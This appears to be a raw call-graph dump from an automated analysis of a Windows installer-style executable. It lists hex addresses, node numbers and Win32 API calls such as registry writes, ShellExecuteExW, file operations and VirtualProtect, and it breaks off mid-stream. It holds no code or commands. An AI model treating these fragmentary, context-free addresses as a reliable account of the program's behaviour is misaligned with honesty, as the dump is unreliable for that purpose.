4390->4394 4392->4362 4393 4067e4 4393->4389 4393->4392 4395 406774 wsprintfW LoadLibraryExW 4394->4395 4395->4393 4397 4053c4 4398 4053d4 4397->4398 4399 4053e8 4397->4399 4400 405431 4398->4400 4401 4053da 4398->4401 4402 4053f0 IsWindowVisible 4399->4402 4409 405410 4399->4409 4403 405436 CallWindowProcW 4400->4403 4411 4043ab 4401->4411 4402->4400 4405 4053fd 4402->4405 4406 4053e4 4403->4406 4414 404d1a SendMessageW 4405->4414 4409->4403 4419 404d9a 4409->4419 4412 4043c3 4411->4412 4413 4043b4 SendMessageW 4411->4413 4412->4406 4413->4412 4415 404d79 SendMessageW 4414->4415 4416 404d3d GetMessagePos ScreenToClient SendMessageW 4414->4416 4417 404d71 4415->4417 4416->4417 4418 404d76 4416->4418 4417->4409 4418->4415 4428 4063e8 lstrcpynW 4419->4428 4421 404dad 4429 40632f wsprintfW 4421->4429 4423 404db7 4430 40140b 4423->4430 4427 404dc7 4427->4400 4428->4421 4429->4423 4434 401389 4430->4434 4433 4063e8 lstrcpynW 4433->4427 4436 401390 4434->4436 4435 4013fe 4435->4433 4436->4435 4437 4013cb MulDiv SendMessageW 4436->4437 4437->4436 4787 6f952993 4788 6f9529e3 4787->4788 4789 6f9529a3 VirtualProtect 4787->4789 4789->4788 4885 401e49 4886 402c1f 17 API calls 4885->4886 4887 401e4f 4886->4887 4888 402c1f 17 API calls 4887->4888 4889 401e5b 4888->4889 4890 401e72 EnableWindow 4889->4890 4891 401e67 ShowWindow 4889->4891 4892 402ac5 4890->4892 4891->4892 4893 40264a 4894 402c1f 17 API calls 4893->4894 4896 402659 4894->4896 4895 402796 4896->4895 4897 4026a3 ReadFile 4896->4897 4898 40273c 4896->4898 4899 405f61 ReadFile 4896->4899 4901 4026e3 MultiByteToWideChar 4896->4901 4902 402798 4896->4902 4904 402709 SetFilePointer MultiByteToWideChar 4896->4904 4905 4027a9 4896->4905 4897->4895 4897->4896 4898->4895 4898->4896 4907 405fbf SetFilePointer 4898->4907 4899->4896 4901->4896 4916 40632f wsprintfW 4902->4916 4904->4896 4905->4895 4906 4027ca SetFilePointer 4905->4906 4906->4895 4908 405fdb 4907->4908 4915 405ff3 4907->4915 4909 405f61 ReadFile 4908->4909 4910 405fe7 4909->4910 4911 406024 SetFilePointer 4910->4911 4912 405ffc SetFilePointer 4910->4912 4910->4915 4911->4915 4912->4911 4913 406007 4912->4913 4914 405f90 WriteFile 4913->4914 4914->4915 4915->4898 4916->4895 4917 404dcc GetDlgItem GetDlgItem 4918 404e1e 7 API calls 4917->4918 4927 405037 4917->4927 4919 404ec1 DeleteObject 4918->4919 4920 404eb4 SendMessageW 4918->4920 4921 404eca 4919->4921 4920->4919 4923 404ed9 4921->4923 4924 404f01 4921->4924 4922 40511b 4925 4051c7 4922->4925 4930 4053af 4922->4930 4936 405174 SendMessageW 4922->4936 4926 40640a 17 API calls 4923->4926 4929 40435f 18 API calls 4924->4929 4931 4051d1 SendMessageW 4925->4931 4932 4051d9 4925->4932 4933 404ee3 SendMessageW SendMessageW 4926->4933 4927->4922 4928 4050fc 4927->4928 4934 405097 4927->4934 4928->4922 4938 40510d SendMessageW 4928->4938 4935 404f15 4929->4935 4937 4043c6 8 API calls 4930->4937 4931->4932 4944 4051f2 4932->4944 4945 4051eb ImageList_Destroy 4932->4945 4949 405202 4932->4949 4933->4921 4939 404d1a 5 API calls 4934->4939 4940 40435f 18 API calls 4935->4940 4936->4930 4942 405189 SendMessageW 4936->4942 4943 4053bd 4937->4943 4938->4922 4952 4050a8 4939->4952 4953 404f23 4940->4953 4941 405371 4941->4930 4950 405383 ShowWindow GetDlgItem ShowWindow 4941->4950 4947 40519c 4942->4947 4948 4051fb GlobalFree 4944->4948 4944->4949 4945->4944 4946 404ff8 GetWindowLongW SetWindowLongW 4951 405011 4946->4951 4958 4051ad SendMessageW 4947->4958 4948->4949 4949->4941 4963 404d9a 4 API calls 4949->4963 4968 40523d 4949->4968 4950->4930 4954 405017 ShowWindow 4951->4954 4955 40502f 4951->4955 4952->4928 4953->4946 4957 404f73 SendMessageW 4953->4957 4959 404ff2 4953->4959 4961 404fc0 SendMessageW 4953->4961 4962 404faf SendMessageW 4953->4962 4973 404394 SendMessageW 4954->4973 4974 404394 SendMessageW 4955->4974 4957->4953 4958->4925 4959->4946 4959->4951 4961->4953 4962->4953 4963->4968 4964 40502a 4964->4930 4965 405347 InvalidateRect 4965->4941 4969 40535d 4965->4969 4966 405281 4966->4965 4971 4052e2 4966->4971 4972 4052f5 SendMessageW SendMessageW 4966->4972 4967 40526b SendMessageW 4967->4966 4968->4966 4968->4967 4975 404cd5 4969->4975 4971->4972 4972->4966 4973->4964 4974->4927 4978 404c0c 4975->4978 4977 404cea 4977->4941 4979 404c25 4978->4979 4980 40640a 17 API calls 4979->4980 4981 404c89 4980->4981 4982 40640a 17 API calls 4981->4982 4983 404c94 4982->4983 4984 40640a 17 API calls 4983->4984 4985 404caa lstrlenW wsprintfW SetDlgItemTextW 4984->4985 4985->4977 5291 4016cc 5292 402c41 17 API calls 5291->5292 5293 4016d2 GetFullPathNameW 5292->5293 5294 4016ec 5293->5294 5295 40170e 5293->5295 5294->5295 5298 40672b 2 API calls 5294->5298 5296 401723 GetShortPathNameW 5295->5296 5297 402ac5 5295->5297 5296->5297 5299 4016fe 5298->5299 5299->5295 5301 4063e8 lstrcpynW 5299->5301 5301->5295 5302 40234e 5303 402c41 17 API calls 5302->5303 5304 40235d 5303->5304 5305 402c41 17 API calls 5304->5305 5306 402366 5305->5306 5307 402c41 17 API calls 5306->5307 5308 402370 GetPrivateProfileStringW 5307->5308 5309 4044cf lstrlenW 5310 4044f0 WideCharToMultiByte 5309->5310 5311 4044ee 5309->5311 5311->5310 5312 404850 5313 40487c 5312->5313 5314 40488d 5312->5314 5373 405a32 GetDlgItemTextW 5313->5373 5315 404899 GetDlgItem 5314->5315 5322 4048f8 5314->5322 5318 4048ad 5315->5318 5317 404887 5320 40667c 5 API calls 5317->5320 5321 4048c1 SetWindowTextW 5318->5321 5325 405d68 4 API calls 5318->5325 5319 4049dc 5370 404b8b 5319->5370 5375 405a32 GetDlgItemTextW 5319->5375 5320->5314 5326 40435f 18 API calls 5321->5326 5322->5319 5327 40640a 17 API calls 5322->5327 5322->5370 5324 4043c6 8 API calls 5329 404b9f 5324->5329 5330 4048b7 5325->5330 5331 4048dd 5326->5331 5332 40496c SHBrowseForFolderW 5327->5332 5328 404a0c 5333 405dc5 18 API calls 5328->5333 5330->5321 5337 405cbd 3 API calls 5330->5337 5334 40435f 18 API calls 5331->5334 5332->5319 5335 404984 CoTaskMemFree 5332->5335 5336 404a12 5333->5336 5338 4048eb 5334->5338 5339 405cbd 3 API calls 5335->5339 5376 4063e8 lstrcpynW 5336->5376 5337->5321 5374 404394 SendMessageW 5338->5374 5341 404991 5339->5341 5344 4049c8 SetDlgItemTextW 5341->5344 5348 40640a 17 API calls 5341->5348 5343 4048f1 5346 4067c2 5 API calls 5343->5346 5344->5319 5345 404a29 5347 4067c2 5 API calls 5345->5347 5346->5322 5355 404a30 5347->5355 5349 4049b0 lstrcmpiW 5348->5349 5349->5344 5351 4049c1 lstrcatW 5349->5351 5350 404a71 5377 4063e8 lstrcpynW 5350->5377 5351->5344 5353 404a78 5354 405d68 4 API calls 5353->5354 5356 404a7e GetDiskFreeSpaceW 5354->5356 5355->5350 5359 405d09 2 API calls 5355->5359 5360 404ac9 5355->5360 5358 404aa2 MulDiv 5356->5358 5356->5360 5358->5360 5359->5355 5361 404cd5 20 API calls 5360->5361 5371 404b3a 5360->5371 5363 404b27 5361->5363 5362 404b5d 5378 404381 EnableWindow 5362->5378 5365 404b3c SetDlgItemTextW 5363->5365 5366 404b2c 5363->5366 5364 40140b 2 API calls 5364->5362 5365->5371 5368 404c0c 20 API calls 5366->5368 5368->5371 5369 404b79 5369->5370 5379 4047a9 5369->5379 5370->5324 5371->5362 5371->5364 5373->5317 5374->5343 5375->5328 5376->5345 5377->5353 5378->5369 5380 4047b7 5379->5380 5381 4047bc SendMessageW 5379->5381 5380->5381 5381->5370 5382 401b53 5383 402c41 17 API calls 5382->5383 5384 401b5a 5383->5384 5385 402c1f 17 API calls 5384->5385 5386 401b63 wsprintfW 5385->5386 5387 402ac5 5386->5387 5388 6f951000 5391 6f95101b 5388->5391 5398 6f951516 5391->5398 5393 6f951020 5394 6f951027 GlobalAlloc 5393->5394 5395 6f951024 5393->5395 5394->5395 5396 6f95153d 3 API calls 5395->5396 5397 6f951019 5396->5397 5400 6f95151c 5398->5400 5399 6f951522 5399->5393 5400->5399 5401 6f95152e GlobalFree 5400->5401 5401->5393 5402 401956 5403 402c41 17 API calls 5402->5403 5404 40195d lstrlenW 5403->5404 5405 402592 5404->5405 5413 4014d7 5414 402c1f 17 API calls 5413->5414 5415 4014dd Sleep 5414->5415 5417 402ac5 5415->5417 5418 401f58 5419 402c41 17 API calls 5418->5419 5420 401f5f 5419->5420 5421 40672b 2 API calls 5420->5421 5422 401f65 5421->5422 5423 401f76 5422->5423 5425 40632f wsprintfW 5422->5425 5425->5423 5426 402259 5427 402c41 17 API calls 5426->5427 5428 40225f 5427->5428 5429 402c41 17 API calls 5428->5429 5430 402268 5429->5430 5431 402c41 17 API calls 5430->5431 5432 402271 5431->5432 5433 40672b 2 API calls 5432->5433 5434 40227a 5433->5434 5435 40228b lstrlenW lstrlenW 5434->5435 5436 40227e 5434->5436 5438 405450 24 API calls 5435->5438 5437 405450 24 API calls 5436->5437 5440 402286 5437->5440 5439 4022c9 SHFileOperationW 5438->5439 5439->5436 5439->5440 5282 40175c 5283 402c41 17 API calls 5282->5283 5284 401763 5283->5284 5285 405f0d 2 API calls 5284->5285 5286 40176a 5285->5286 5287 405f0d 2 API calls 5286->5287 5287->5286 5441 401d5d GetDlgItem GetClientRect 5442 402c41 17 API calls 5441->5442 5443 401d8f LoadImageW SendMessageW 5442->5443 5444 402ac5 5443->5444 5445 401dad DeleteObject 5443->5445 5445->5444 5446 4022dd 5447 4022f7 5446->5447 5448 4022e4 5446->5448 5449 40640a 17 API calls 5448->5449 5450 4022f1 5449->5450 5451 405a4e MessageBoxIndirectW 5450->5451 5451->5447 5452 401563 5453 402a6b 5452->5453 5456 40632f wsprintfW 5453->5456 5455 402a70 5456->5455 4438 4023e4 4439 402c41 17 API calls 4438->4439 4440 4023f6 4439->4440 4441 402c41 17 API calls 4440->4441 4442 402400 4441->4442 4455 402cd1 4442->4455 4445 402438 4448 402444 4445->4448 4459 402c1f 4445->4459 4446 40288b 4447 402c41 17 API calls 4449 40242e lstrlenW 4447->4449 4451 402463 RegSetValueExW 4448->4451 4462 4031d6 4448->4462 4449->4445 4453 402479 RegCloseKey 4451->4453 4453->4446 4456 402cec 4455->4456 4477 406283 4456->4477 4460 40640a 17 API calls 4459->4460 4461 402c34 4460->4461 4461->4448 4463 403201 4462->4463 4464 4031e5 SetFilePointer 4462->4464 4481 4032de GetTickCount 4463->4481 4464->4463 4467 405f61 ReadFile 4468 403221 4467->4468 4469 4032de 42 API calls 4468->4469 4476 40329e 4468->4476 4470 403238 4469->4470 4471 4032a4 ReadFile 4470->4471 4474 403247 4470->4474 4470->4476 4471->4476 4473 405f61 ReadFile 4473->4474 4474->4473 4475 405f90 WriteFile 4474->4475 4474->4476 4475->4474 4476->4451 4478 406292 4477->4478 4479 402410 4478->4479 4480 40629d RegCreateKeyExW 4478->4480 4479->4445 4479->4446 4479->4447 4480->4479 4482 403436 4481->4482 4483 40330c 4481->4483 4484 402e8e 32 API calls 4482->4484 4494 40345d SetFilePointer 4483->4494 4490 403208 4484->4490 4486 403317 SetFilePointer 4492 40333c 4486->4492 4490->4467 4490->4476 4491 405f90 WriteFile 4491->4492 4492->4490 4492->4491 4493 403417 SetFilePointer 4492->4493 4495 403447 4492->4495 4498 406943 4492->4498 4505 402e8e 4492->4505 4493->4482 4494->4486 4496 405f61 ReadFile 4495->4496 4497 40345a 4496->4497 4497->4492 4499 406968 4498->4499 4500 406970 4498->4500 4499->4492 4500->4499 4501 406a00 GlobalAlloc 4500->4501 4502 4069f7 GlobalFree 4500->4502 4503 406a77 GlobalAlloc 4500->4503 4504 406a6e GlobalFree 4500->4504 4501->4499 4501->4500 4502->4501 4503->4499 4503->4500 4504->4503 4506 402eb7 4505->4506 4507 402e9f 4505->4507 4510 402ec7 GetTickCount 4506->4510 4511 402ebf 4506->4511 4508 402ea8 DestroyWindow 4507->4508 4509 402eaf 4507->4509 4508->4509 4509->4492 4510->4509 4513 402ed5 4510->4513 4520 4067fe 4511->4520 4514 402f0a CreateDialogParamW ShowWindow 4513->4514 4515 402edd 4513->4515 4514->4509 4515->4509 4524 402e72 4515->4524 4517 402eeb wsprintfW 4518 405450 24 API calls 4517->4518 4519 402f08 4518->4519 4519->4509 4521 40681b PeekMessageW 4520->4521 4522 406811 DispatchMessageW 4521->4522 4523 40682b 4521->4523 4522->4521 4523->4509 4525 402e81 4524->4525 4526 402e83 MulDiv 4524->4526 4525->4526 4526->4517 5464 402868 5465 402c41 17 API calls 5464->5465 5466 40286f FindFirstFileW 5465->5466 5467 402897 5466->5467 5470 402882 5466->5470 5472 40632f wsprintfW 5467->5472 5469 4028a0 5473 4063e8 lstrcpynW 5469->5473 5472->5469 5473->5470 5474 401968 5475 402c1f 17 API calls 5474->5475 5476 40196f 5475->5476 5477 402c1f 17 API calls 5476->5477 5478 40197c 5477->5478 5479 402c41 17 API calls 5478->5479 5480 401993 lstrlenW 5479->5480 5482 4019a4 5480->5482 5481 4019e5 5482->5481 5486 4063e8 lstrcpynW 5482->5486 5484 4019d5 5484->5481 5485 4019da lstrlenW 5484->5485 5485->5481 5486->5484 5487 6f95103d 5488 6f95101b 5 API calls 5487->5488 5489 6f951056 5488->5489 5490 40166a 5491 402c41 17 API calls 5490->5491 5492 401670 5491->5492 5493 40672b 2 API calls 5492->5493 5494 401676 5493->5494 5015 40176f 5016 402c41 17 API calls 5015->5016 5017 401776 5016->5017 5018 401796 5017->5018 5019 40179e 5017->5019 5055 4063e8 lstrcpynW 5018->5055 5056 4063e8 lstrcpynW 5019->5056 5022 40179c 5026 40667c 5 API calls 5022->5026 5023 4017a9 5024 405cbd 3 API calls 5023->5024 5025 4017af lstrcatW 5024->5025 5025->5022 5042 4017bb 5026->5042 5027 40672b 2 API calls 5027->5042 5028 4017f7 5029 405eb9 2 API calls 5028->5029 5029->5042 5031 4017cd CompareFileTime 5031->5042 5032 40188d 5033 405450 24 API calls 5032->5033 5034 401897 5033->5034 5037 4031d6 44 API calls 5034->5037 5035 405450 24 API calls 5044 401879 5035->5044 5036 4063e8 lstrcpynW 5036->5042 5038 4018aa 5037->5038 5039 4018be SetFileTime 5038->5039 5041 4018d0 CloseHandle 5038->5041 5039->5041 5040 40640a 17 API calls 5040->5042 5043 4018e1 5041->5043 5041->5044 5042->5027 5042->5028 5042->5031 5042->5032 5042->5036 5042->5040 5049 405a4e MessageBoxIndirectW 5042->5049 5053 401864 5042->5053 5054 405ede GetFileAttributesW CreateFileW 5042->5054 5045 4018e6 5043->5045 5046 4018f9 5043->5046 5047 40640a 17 API calls 5045->5047 5048 40640a 17 API calls 5046->5048 5050 4018ee lstrcatW 5047->5050 5051 401901 5048->5051 5049->5042 5050->5051 5052 405a4e MessageBoxIndirectW 5051->5052 5052->5044 5053->5035 5053->5044 5054->5042 5055->5022 5056->5023 5057 4027ef 5058 4027f6 5057->5058 5061 402a70 5057->5061 5059 402c1f 17 API calls 5058->5059 5060 4027fd 5059->5060 5062 40280c SetFilePointer 5060->5062 5062->5061 5063 40281c 5062->5063 5065 40632f wsprintfW 5063->5065 5065->5061 5495 401a72 5496 402c1f 17 API calls 5495->5496 5497 401a7b 5496->5497 5498 402c1f 17 API calls 5497->5498 5499 401a20 5498->5499 5500 406af2 5502 406976 5500->5502 5501 4072e1 5502->5501 5503 406a00 GlobalAlloc 5502->5503 5504 4069f7 GlobalFree 5502->5504 5505 406a77 GlobalAlloc 5502->5505 5506 406a6e GlobalFree 5502->5506 5503->5501 5503->5502 5504->5503 5505->5501 5505->5502 5506->5505 5507 401573 5508 401583 ShowWindow 5507->5508 5509 40158c 5507->5509 5508->5509 5510 402ac5 5509->5510 5511 40159a ShowWindow 5509->5511 5511->5510 5512 401cf3 5513 402c1f 17 API calls 5512->5513 5514 401cf9 IsWindow 5513->5514 5515 401a20 5514->5515 5516 402df3 5517 402e05 SetTimer 5516->5517 5518 402e1e 5516->5518 5517->5518 5519 402e6c 5518->5519 5520 402e72 MulDiv 5518->5520 5521 402e2c wsprintfW SetWindowTextW SetDlgItemTextW 5520->5521 5521->5519 5523 4014f5 SetForegroundWindow 5524 402ac5 5523->5524 5525 402576 5526 402c41 17 API calls 5525->5526 5527 40257d 5526->5527 5530 405ede GetFileAttributesW CreateFileW 5527->5530 5529 402589 5530->5529 5531 401b77 5532 401bc8 5531->5532 5534 401b84 5531->5534 5535 401bf2 GlobalAlloc 5532->5535 5536 401bcd 5532->5536 5533 401c0d 5538 40640a 17 API calls 5533->5538 5546 4022f7 5533->5546 5534->5533 5540 401b9b 5534->5540 5537 40640a 17 API calls 5535->5537 5536->5546 5552 4063e8 lstrcpynW 5536->5552 5537->5533 5539 4022f1 5538->5539 5544 405a4e MessageBoxIndirectW 5539->5544 5550 4063e8 lstrcpynW 5540->5550 5543 401bdf GlobalFree 5543->5546 5544->5546 5545 401baa 5551 4063e8 lstrcpynW 5545->5551 5548 401bb9 5553 4063e8 lstrcpynW 5548->5553 5550->5545 5551->5548 5552->5543 5553->5546 5257 4024f8 5258 402c81 17 API calls 5257->5258 5259 402502 5258->5259 5260 402c1f 17 API calls 5259->5260 5261 40250b 5260->5261 5262 402533 RegEnumValueW 5261->5262 5263 402527 RegEnumKeyW 5261->5263 5265 40288b 5261->5265 5264 402548 5262->5264 5266 40254f RegCloseKey 5262->5266 5263->5266 5264->5266 5266->5265 5268 40167b 5269 402c41 17 API calls 5268->5269 5270 401682 5269->5270 5271 402c41 17 API calls 5270->5271 5272 40168b 5271->5272 5273 402c41 17 API calls 5272->5273 5274 401694 MoveFileW 5273->5274 5275 4016a7 5274->5275 5281 4016a0 5274->5281 5276 40672b 2 API calls 5275->5276 5278 402250 5275->5278 5279 4016b6 5276->5279 5277 401423 24 API calls 5277->5278 5279->5278 5280 4061ae 36 API calls 5279->5280 5280->5281 5281->5277 5561 401e7d 5562 402c41 17 API calls 5561->5562 5563 401e83 5562->5563 5564 402c41 17 API calls 5563->5564 5565 401e8c 5564->5565 5566 402c41 17 API calls 5565->5566 5567 401e95 5566->5567 5568 402c41 17 API calls 5567->5568 5569 401e9e 5568->5569 5570 401423 24 API calls 5569->5570 5571 401ea5 5570->5571 5578 405a14 ShellExecuteExW 5571->5578 5573 401ee7 5576 40288b 5573->5576 5579 406873 WaitForSingleObject 5573->5579 5575 401f01 CloseHandle 5575->5576 5578->5573 5580 40688d 5579->5580 5581 40689f GetExitCodeProcess 5580->5581 5582 4067fe 2 API calls 5580->5582 5581->5575 5583 406894 WaitForSingleObject 5582->5583 5583->5580 5584 4019ff 5585 402c41 17 API calls 5584->5585 5586 401a06 5585->5586 5587 402c41 17 API calls 5586->5587 5588 401a0f 5587->5588 5589 401a16 lstrcmpiW 5588->5589 5590 401a28 lstrcmpW 5588->5590 5591 401a1c 5589->5591 5590->5591 5592 401000 5593 401037 BeginPaint GetClientRect 5592->5593 5594 40100c DefWindowProcW 5592->5594 5596 4010f3 5593->5596 5597 401179 5594->5597 5598 401073 CreateBrushIndirect FillRect DeleteObject 5596->5598 5599 4010fc 5596->5599 5598->5596 5600 401102 CreateFontIndirectW 5599->5600 5601 401167 EndPaint 5599->5601 5600->5601 5602 401112 6 API calls 5600->5602 5601->5597 5602->5601 5603 6f9516d4 5604 6f951703 5603->5604 5605 6f951b5f 22 API calls 5604->5605 5606 6f95170a 5605->5606 5607 6f951711 5606->5607 5608 6f95171d 5606->5608 5609 6f951272 2 API calls 5607->5609 5610 6f951744 5608->5610 5611 6f951727 5608->5611 5614 6f95171b 5609->5614 5612 6f95176e 5610->5612 5613 6f95174a 5610->5613 5615 6f95153d 3 API calls 5611->5615 5617 6f95153d 3 API calls 5612->5617 5616 6f9515b4 3 API calls 5613->5616 5618 6f95172c 5615->5618 5619 6f95174f 5616->5619 5617->5614 5620 6f9515b4 3 API calls 5618->5620 5621 6f951272 2 API calls 5619->5621 5622 6f951732 5620->5622 5623 6f951755 GlobalFree 5621->5623 5624 6f951272 2 API calls 5622->5624 5623->5614 5626 6f951769 GlobalFree 5623->5626 5625 6f951738 GlobalFree 5624->5625 5625->5614 5626->5614 5627 6f952c57 5628 6f952c6f 5627->5628 5629 6f95158f 2 API calls 5628->5629 5630 6f952c8a 5629->5630 5631 401503 5632 40150b 5631->5632 5634 40151e 5631->5634 5633 402c1f 17 API calls 5632->5633 5633->5634 4527 402484 4538 402c81 4527->4538 4530 402c41 17 API calls 4531 402497 4530->4531 4532 4024a2 RegQueryValueExW 4531->4532 4534 40288b 4531->4534 4533 4024c2 4532->4533 4535 4024c8 RegCloseKey 4532->4535 4533->4535 4543 40632f wsprintfW 4533->4543 4535->4534 4539 402c41 17 API calls 4538->4539 4540 402c98 4539->4540 4541 406255 RegOpenKeyExW 4540->4541 4542 40248e 4541->4542 4542->4530 4543->4535 5635 402104 5636 402c41 17 API calls 5635->5636 5637 40210b 5636->5637 5638 402c41 17 API calls 5637->5638 5639 402115 5638->5639 5640 402c41 17 API calls 5639->5640 5641 40211f 5640->5641 5642 402c41 17 API calls 5641->5642 5643 402129 5642->5643 5644 402c41 17 API calls 5643->5644 5646 402133 5644->5646 5645 402172 CoCreateInstance 5650 402191 5645->5650 5646->5645 5647 402c41 17 API calls 5646->5647 5647->5645 5648 401423 24 API calls 5649 402250 5648->5649 5650->5648 5650->5649 4790 403e86 4791 403fd9 4790->4791 4792 403e9e 4790->4792 4793 403fea GetDlgItem GetDlgItem 4791->4793 4802 40402a 4791->4802 4792->4791 4794 403eaa 4792->4794 4795 40435f 18 API calls 4793->4795 4797 403eb5 SetWindowPos 4794->4797 4798 403ec8 4794->4798 4801 404014 SetClassLongW 4795->4801 4796 404084 4803 4043ab SendMessageW 4796->4803 4808 403fd4 4796->4808 4797->4798 4799 403ee5 4798->4799 4800 403ecd ShowWindow 4798->4800 4804 403f07 4799->4804 4805 403eed DestroyWindow 4799->4805 4800->4799 4806 40140b 2 API calls 4801->4806 4802->4796 4807 401389 2 API calls 4802->4807 4830 404096 4803->4830 4810 403f0c SetWindowLongW 4804->4810 4811 403f1d 4804->4811 4809 404309 4805->4809 4806->4802 4812 40405c 4807->4812 4809->4808 4818 404319 ShowWindow 4809->4818 4810->4808 4815 403fc6 4811->4815 4816 403f29 GetDlgItem 4811->4816 4812->4796 4817 404060 SendMessageW 4812->4817 4813 40140b 2 API calls 4813->4830 4814 4042ea DestroyWindow EndDialog 4814->4809 4871 4043c6 4815->4871 4819 403f59 4816->4819 4820 403f3c SendMessageW IsWindowEnabled 4816->4820 4817->4808 4818->4808 4823 403f66 4819->4823 4825 403fad SendMessageW 4819->4825 4826 403f79 4819->4826 4834 403f5e 4819->4834 4820->4808 4820->4819 4822 40640a 17 API calls 4822->4830 4823->4825 4823->4834 4825->4815 4827 403f81 4826->4827 4828 403f96 4826->4828 4831 40140b 2 API calls 4827->4831 4832 40140b 2 API calls 4828->4832 4829 403f94 4829->4815 4830->4808 4830->4813 4830->4814 4830->4822 4833 40435f 18 API calls 4830->4833 4852 40422a DestroyWindow 4830->4852 4862 40435f 4830->4862 4831->4834 4835 403f9d 4832->4835 4833->4830 4868 404338 4834->4868 4835->4815 4835->4834 4837 404111 GetDlgItem 4838 404126 4837->4838 4839 40412e ShowWindow KiUserCallbackDispatcher 4837->4839 4838->4839 4865 404381 EnableWindow 4839->4865 4841 404158 EnableWindow 4846 40416c 4841->4846 4842 404171 GetSystemMenu EnableMenuItem SendMessageW 4843 4041a1 SendMessageW 4842->4843 4842->4846 4843->4846 4845 403e67 18 API calls 4845->4846 4846->4842 4846->4845 4866 404394 SendMessageW 4846->4866 4867 4063e8 lstrcpynW 4846->4867 4848 4041d0 lstrlenW 4849 40640a 17 API calls 4848->4849 4850 4041e6 SetWindowTextW 4849->4850 4851 401389 2 API calls 4850->4851 4851->4830 4852->4809 4853 404244 CreateDialogParamW 4852->4853 4853->4809 4854 404277 4853->4854 4855 40435f 18 API calls 4854->4855 4856 404282 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4855->4856 4857 401389 2 API calls 4856->4857 4858 4042c8 4857->4858 4858->4808 4859 4042d0 ShowWindow 4858->4859 4860 4043ab SendMessageW 4859->4860 4861 4042e8 4860->4861 4861->4809 4863 40640a 17 API calls 4862->4863 4864 40436a SetDlgItemTextW 4863->4864 4864->4837 4865->4841 4866->4846 4867->4848 4869 404345 SendMessageW 4868->4869 4870 40433f 4868->4870 4869->4829 4870->4869 4872 404489 4871->4872 4873 4043de GetWindowLongW 4871->4873 4872->4808 4873->4872 4874 4043f3 4873->4874 4874->4872 4875 404420 GetSysColor 4874->4875 4876 404423 4874->4876 4875->4876 4877 404433 SetBkMode 4876->4877 4878 404429 SetTextColor 4876->4878 4879 404451 4877->4879 4880 40444b GetSysColor 4877->4880 4878->4877 4881 404462 4879->4881 4882 404458 SetBkColor 4879->4882 4880->4879 4881->4872 4883 404475 DeleteObject 4881->4883 4884 40447c CreateBrushIndirect 4881->4884 4882->4881 4883->4884 4884->4872 5651 401f06 5652 402c41 17 API calls 5651->5652 5653 401f0c 5652->5653 5654 405450 24 API calls 5653->5654 5655 401f16 5654->5655 5656 4059d1 2 API calls 5655->5656 5657 401f1c 5656->5657 5658 40288b 5657->5658 5660 406873 5 API calls 5657->5660 5662 401f3f CloseHandle 5657->5662 5661 401f31 5660->5661 5661->5662 5664 40632f wsprintfW 5661->5664 5662->5658 5664->5662 5665 404809 5666 404819 5665->5666 5667 40483f 5665->5667 5668 40435f 18 API calls 5666->5668 5669 4043c6 8 API calls 5667->5669 5670 404826 SetDlgItemTextW 5668->5670 5671 40484b 5669->5671 5670->5667 5672 40190c 5673 401943 5672->5673 5674 402c41 17 API calls 5673->5674 5675 401948 5674->5675 5676 405afa 67 API calls 5675->5676 5677 401951 5676->5677 5678 40230c 5679 402314 5678->5679 5681 40231a 5678->5681 5680 402c41 17 API calls 5679->5680 5680->5681 5682 402c41 17 API calls 5681->5682 5683 402328 5681->5683 5682->5683 5684 402c41 17 API calls 5683->5684 5686 402336 5683->5686 5684->5686 5685 402c41 17 API calls 5687 40233f WritePrivateProfileStringW 5685->5687 5686->5685 5688 6f9518d9 5690 6f9518fc 5688->5690 5689 6f951943 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5692 6f951272 2 API calls 5689->5692 5690->5689 5691 6f951931 GlobalFree 5690->5691 5691->5689 5693 6f951ace GlobalFree GlobalFree 5692->5693 5694 401f8c 5695 402c41 17 API calls 5694->5695 5696 401f93 5695->5696 5697 4067c2 5 API calls 5696->5697 5698 401fa2 5697->5698 5699 401fbe GlobalAlloc 5698->5699 5708 402026 5698->5708 5700 401fd2 5699->5700 5699->5708 5701 4067c2 5 API calls 5700->5701 5702 401fd9 5701->5702 5703 4067c2 5 API calls 5702->5703 5704 401fe3 5703->5704 5704->5708 5709 40632f wsprintfW 5704->5709 5706 402018 5710 40632f wsprintfW 5706->5710 5709->5706 5710->5708 5711 6f951058 5713 6f951074 5711->5713 5712 6f9510dd 5713->5712 5714 6f951516 GlobalFree 5713->5714 5715 6f951092 5713->5715 5714->5715 5716 6f951516 GlobalFree 5715->5716 5717 6f9510a2 5716->5717 5718 6f9510b2 5717->5718 5719 6f9510a9 GlobalSize 5717->5719 5720 6f9510b6 GlobalAlloc 5718->5720 5721 6f9510c7 5718->5721 5719->5718 5722 6f95153d 3 API calls 5720->5722 5723 6f9510d2 GlobalFree 5721->5723 5722->5721 5723->5712 4986 40238e 4987 4023c1 4986->4987 4988 402396 4986->4988 4990 402c41 17 API calls 4987->4990 4989 402c81 17 API calls 4988->4989 4991 40239d 4989->4991 4992 4023c8 4990->4992 4993 4023a7 4991->4993 4996 4023d5 4991->4996 4998 402cff 4992->4998 4995 402c41 17 API calls 4993->4995 4997 4023ae RegDeleteValueW RegCloseKey 4995->4997 4997->4996 4999 402d0c 4998->4999 5000 402d13 4998->5000 4999->4996 5000->4999 5002 402d44 5000->5002 5003 406255 RegOpenKeyExW 5002->5003 5004 402d72 5003->5004 5005 402d76 5004->5005 5006 402dec 5004->5006 5007 402d98 RegEnumKeyW 5005->5007 5008 402daf RegCloseKey 5005->5008 5009 402dd0 RegCloseKey 5005->5009 5011 402d44 6 API calls 5005->5011 5006->4999 5007->5005 5007->5008 5010 4067c2 5 API calls 5008->5010 5009->5006 5012 402dbf 5010->5012 5011->5005 5013 402de0 RegDeleteKeyW 5012->5013 5014 402dc3 5012->5014 5013->5006 5014->5006 5724 40190f 5725 402c41 17 API calls 5724->5725 5726 401916 5725->5726 5727 405a4e MessageBoxIndirectW 5726->5727 5728 40191f 5727->5728 5729 40558f 5730 4055b0 GetDlgItem GetDlgItem GetDlgItem 5729->5730 5731 405739 5729->5731 5774 404394 SendMessageW 5730->5774 5733 405742 GetDlgItem CreateThread CloseHandle 5731->5733 5736 40576a 5731->5736 5733->5736 5734 405620 5740 405627 GetClientRect GetSystemMetrics SendMessageW SendMessageW 5734->5740 5735 405795 5739 4057f5 5735->5739 5742 4057a9 5735->5742 5743 4057cf ShowWindow 5735->5743 5736->5735 5737 405781 ShowWindow ShowWindow 5736->5737 5738 4057ba 5736->5738 5776 404394 SendMessageW 5737->5776 5744 